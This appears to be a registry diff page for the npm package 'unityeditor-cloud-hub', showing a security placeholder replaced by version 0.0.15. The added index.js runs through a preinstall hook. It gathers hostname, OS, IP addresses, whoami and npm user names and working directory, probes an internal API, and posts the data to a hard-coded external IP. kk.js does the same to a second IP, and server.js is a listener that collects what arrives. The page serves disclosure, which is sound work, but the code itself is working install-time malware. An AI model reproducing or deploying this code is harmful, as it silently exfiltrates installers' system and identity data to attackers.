unityeditor-cloud-hub 0.0.1-security → 0.0.15

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of unityeditor-cloud-hub might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/index.js +106 -0
  2. package/kk.js +69 -0
  3. package/package.json +30 -3
  4. package/server.js +14 -0
  5. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,106 @@
1
+ const os = require('os');
2
+ const axios = require('axios');
3
+ const { execSync } = require('child_process');
4
+ const fs = require('fs');
5
+ const path = require('path');
6
+
7
+ // Function to get the public IP address
8
+ async function getPublicIP() {
9
+ try {
10
+ const response = await axios.get('https://ipinfo.io/json');
11
+ return response.data.ip || 'Unknown';
12
+ } catch (error) {
13
+ console.error('Error fetching public IP:', error.message);
14
+ return 'Unknown';
15
+ }
16
+ }
17
+
18
+ // Function to check internal API access
19
+ async function checkInternalAPI() {
20
+ try {
21
+ const response = await axios.get('http://internal-api.company.com/ping'); // Replace with actual internal API
22
+ return response.status === 200 ? 'Accessible' : 'No Access';
23
+ } catch (error) {
24
+ return 'No Access';
25
+ }
26
+ }
27
+
28
+ // Function to get NPM user
29
+ function getNpmUser() {
30
+ try {
31
+ return execSync('npm whoami', { encoding: 'utf8' }).trim();
32
+ } catch (error) {
33
+ return 'Unknown';
34
+ }
35
+ }
36
+
37
+ // Function to get whoami user
38
+ function getWhoamiUser() {
39
+ try {
40
+ return execSync('whoami', { encoding: 'utf8' }).trim();
41
+ } catch (error) {
42
+ return 'Unknown';
43
+ }
44
+ }
45
+
46
+ // Function to collect system and network information
47
+ function getNetworkInfo() {
48
+ const interfaces = os.networkInterfaces();
49
+ let ipAddress = 'Unknown';
50
+
51
+ // Find the first non-internal IPv4 address
52
+ for (const iface of Object.values(interfaces)) {
53
+ for (const details of iface) {
54
+ if (details.family === 'IPv4' && !details.internal) {
55
+ ipAddress = details.address;
56
+ break;
57
+ }
58
+ }
59
+ }
60
+
61
+ return {
62
+ hostname: os.hostname(),
63
+ osType: os.type(),
64
+ osPlatform: os.platform(),
65
+ osRelease: os.release(),
66
+ localIP: ipAddress,
67
+ whoamiUser: getWhoamiUser(),
68
+ npmUser: getNpmUser(),
69
+ currentDirectory: process.cwd() // Collect current directory
70
+ };
71
+ }
72
+
73
+ // Function to send collected data (Pingback)
74
+ async function pingBack(data) {
75
+ try {
76
+ console.log("Sending data:", JSON.stringify(data, null, 2)); // Debugging log
77
+
78
+ const response = await axios.post('http://23.22.251.177:8080/collect_info.php', data, {
79
+ headers: {
80
+ 'Content-Type': 'application/json' // Ensure correct content type
81
+ }
82
+ });
83
+
84
+ console.log('Pingback sent successfully:', response.data);
85
+ } catch (error) {
86
+ console.error('Error sending pingback:', error.response ? error.response.data : error.message);
87
+ }
88
+ }
89
+
90
+ // Main function to collect and send data
91
+ async function collectData() {
92
+ const networkInfo = getNetworkInfo();
93
+ const publicIP = await getPublicIP();
94
+ const internalAPI = await checkInternalAPI();
95
+
96
+ const data = {
97
+ ...networkInfo,
98
+ publicIP,
99
+ internalAPI
100
+ };
101
+
102
+ await pingBack(data);
103
+ }
104
+
105
+ // Execute the script
106
+ collectData();
package/kk.js ADDED
@@ -0,0 +1,69 @@
1
+ const os = require('os');
2
+ const axios = require('axios');
3
+
4
+ // Function to get the public IP address
5
+ async function getPublicIP() {
6
+ try {
7
+ const response = await axios.get('https://ipinfo.io/json');
8
+ return response.data.ip || 'Unknown';
9
+ } catch (error) {
10
+ console.error('Error fetching public IP:', error.message);
11
+ return 'Unknown';
12
+ }
13
+ }
14
+
15
+ // Function to send collected data (Pingback)
16
+ async function pingBack(data) {
17
+ try {
18
+ console.log("Sending data:", JSON.stringify(data, null, 2)); // Debugging log
19
+
20
+ const response = await axios.post('http://35.170.187.220:8080/collect_info.php', data, {
21
+ headers: {
22
+ 'Content-Type': 'application/json' // Ensure correct content type
23
+ }
24
+ });
25
+
26
+ console.log('Pingback sent successfully:', response.data);
27
+ } catch (error) {
28
+ console.error('Error sending pingback:', error.response ? error.response.data : error.message);
29
+ }
30
+ }
31
+
32
+ // Function to collect system and network information
33
+ function getNetworkInfo() {
34
+ const interfaces = os.networkInterfaces();
35
+ let ipAddress = 'Unknown';
36
+
37
+ // Find the first non-internal IPv4 address
38
+ for (const iface of Object.values(interfaces)) {
39
+ for (const details of iface) {
40
+ if (details.family === 'IPv4' && !details.internal) {
41
+ ipAddress = details.address;
42
+ break;
43
+ }
44
+ }
45
+ }
46
+
47
+ return {
48
+ hostname: os.hostname(),
49
+ homeDirectory: os.homedir(),
50
+ currentDirectory: process.cwd(),
51
+ localIP: ipAddress
52
+ };
53
+ }
54
+
55
+ // Main function to collect and send data
56
+ async function collectData() {
57
+ const networkInfo = getNetworkInfo();
58
+ const publicIP = await getPublicIP();
59
+
60
+ const data = {
61
+ ...networkInfo,
62
+ publicIP
63
+ };
64
+
65
+ await pingBack(data);
66
+ }
67
+
68
+ // Execute the script
69
+ collectData();
package/package.json CHANGED
@@ -1,6 +1,33 @@
1
1
  {
2
2
  "name": "unityeditor-cloud-hub",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "0.0.15",
4
+ "description": "Package Claimed By JPD",
5
+ "license": "ISC",
6
+ "author": "JPD",
7
+ "type": "commonjs",
8
+ "main": "index.js",
9
+ "scripts": {
10
+ "preinstall": "node index.js",
11
+ "test": "echo \"Error: no test specified\" && exit 1"
12
+ },
13
+ "keywords": [
14
+ "rce",
15
+ "security",
16
+ "exploit",
17
+ "vulnerability"
18
+ ],
19
+ "repository": {
20
+ "type": "git",
21
+ "url": "git+https://github.com/JPD-12/public-repo-ui.git"
22
+ },
23
+ "bugs": {
24
+ "url": "https://github.com/JPD-12/public-repo-ui/issues"
25
+ },
26
+ "homepage": "https://github.com/JPD-12/public-repo-ui#readme",
27
+ "engines": {
28
+ "node": ">=14.0.0"
29
+ },
30
+ "dependencies": {
31
+ "axios": "^1.7.9"
32
+ }
6
33
  }
package/server.js ADDED
@@ -0,0 +1,14 @@
1
+ const express = require('express');
2
+ const app = express();
3
+ const port = 8080;
4
+
5
+ app.use(express.json());
6
+
7
+ app.post('/', (req, res) => {
8
+ console.log('Received data:', req.body); // Log the incoming data
9
+ res.status(200).send('Data received');
10
+ });
11
+
12
+ app.listen(port, () => {
13
+ console.log(`Server running at http://23.22.251.177:${port}/`);
14
+ });
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=unityeditor-cloud-hub for more information.